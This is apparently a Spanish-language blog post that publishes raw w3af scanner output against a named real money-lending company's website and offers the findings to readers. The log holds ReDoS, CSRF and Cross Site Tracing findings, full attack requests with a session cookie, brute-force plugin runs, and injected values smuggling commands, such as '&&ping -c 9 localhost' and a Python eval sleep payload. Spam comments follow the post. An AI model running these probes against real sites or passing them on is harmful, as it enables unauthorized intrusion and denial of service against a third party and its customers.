He aqui otre web vulnerable a ReDoS y a xrfs:get_xsrf y xst: xst
Esta es una empresa que sededica al prestamo de dinero enfocado alas amas de casa
scaneo:
http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 12:08:19 PM EDT] The "lang" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Thu 26 May 2011 12:08:24 PM EDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Thu 26 May 2011 12:08:38 PM EDT] The page language is: es
[Thu 26 May 2011 12:08:39 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.
[Thu 26 May 2011 12:08:46 PM EDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 12:08:46 PM EDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 12:08:46 PM EDT] Found 3 URLs and 5 different points of injection.
[Thu 26 May 2011 12:08:46 PM EDT] The list of URLs is:
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search
[Thu 26 May 2011 12:08:46 PM EDT] The list of fuzzable requests is:
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1 | Method: GET | Parameters: (gclid="CJD-8bTDhq...")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="10000")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="3900")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search | Method: GET | Parameters: (q="")
[Thu 26 May 2011 12:08:56 PM EDT] The web application sent a persistent cookie.
[Thu 26 May 2011 12:08:56 PM EDT] The following scripts are vulnerable to a trivial form of XSRF:
[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/search
[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1
[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/search is vulnerable to cross site request forgery.
[Thu 26 May 2011 12:10:02 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.
[Thu 26 May 2011 12:10:02 PM EDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 19 to 20.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/campaign_lp_v1" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 1.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 21.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 22.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/search" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 32.
[Thu 26 May 2011 12:11:02 PM EDT] A possible ReDoS was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=11111111111111111111111111111111199%21". . Please review manually. This information was found in the request with id 239.
[Thu 26 May 2011 12:11:02 PM EDT] ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.
[Thu 26 May 2011 12:13:22 PM EDT] A possible OS Commanding was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=%26%26ping+-c+9+localhost".Please review manually. This information was found in the request with id 327.
[Thu 26 May 2011 12:14:35 PM EDT] eval() input injection was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 569.
[Thu 26 May 2011 12:16:06 PM EDT] The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.
[Thu 26 May 2011 12:19:00 PM EDT] Password profiling TOP 100:
[Thu 26 May 2011 12:19:00 PM EDT] - [1] Loan with 9024 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [2] Pago with 3028 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [3] Amount with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [4] rate with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [5] Home with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [6] Weekly with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [7] Type with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [8] service with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [9] Interest with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [10] Repayment with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [11] charges with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [12] Term with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [13] Breakdown with 3008 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [14] pago with 1506 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [15] Primer with 1504 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [17] Regular with 1504 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [18] Seleccionar with 1504 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [19] ClickTale with 1416 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [20] document with 1320 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [21] script with 1300 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [23] https with 944 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [24] part with 944 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [25] text with 944 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [26] javascript with 708 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [27] type with 695 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [30] class with 540 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [32] function with 492 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [33] sitio with 474 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [34] clicktale with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [35] Bottom with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [36] site with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [37] endif with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [38] protocol with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [39] location with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [40] push with 472 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [41] write with 376 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [43] Mexico with 356 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [45] Buscar with 332 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [50] favor with 290 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [51] cript with 280 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [52] typeof with 256 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [56] segment with 240 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [58] Promociones with 238 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [59] Nuestro with 238 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [60] Noticias with 238 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [63] Imprimir with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [64] contigo with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [65] Seguridad with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [66] Mapa with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [67] compromiso with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [68] Busque with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [70] frecuentes with 237 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [73] pantherssl with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [74] Preguntas with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [75] CURRENCY with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [76] 3Cscript with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [78] WRb6 with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [80] href with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [81] stylesheet with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [82] getElementsByTagName with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [84] media with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [85] getTime with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [86] unescape with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [87] Nuestra with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [88] Date with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [89] parentNode with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [90] 20src with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [91] analytics with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [92] ClickTaleSSL with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [93] Accesibilidad with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [94] www02 with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [95] screen with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [96] Usuario with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [98] 20type with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [99] Inicio with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] - [100] async with 236 repetitions.
[Thu 26 May 2011 12:19:00 PM EDT] The cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/" was sent by these URLs:
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/ZEPQu.html
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/search
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/_vti_inf.html
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/EEfFv
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_bin/_vti_aut/author.dll
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_inf.html
[Thu 26 May 2011 12:19:00 PM EDT] Finished scanning process.
redos: Redos Vulneravilidad.
ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.
GET http://www.provident.com.mx/pages/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21 HTTP/1.1
Host: www.provident.com.mx
Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
xrfs:get_xsrf
The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.
xst: xst
The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.
TRACE http://www.provident.com.mx/pages/?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ HTTP/1.1
Host: www.provident.com.mx
Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Liga de Informacion:http://en.wikipedia.org/wiki/ReDoS
Hay se las Dejo
Saludos Mundo Libre.
Este comentario ha sido eliminado por un administrador del blog.
ResponderEliminarI love music, I love life, I love True Religion jeans too.
ResponderEliminar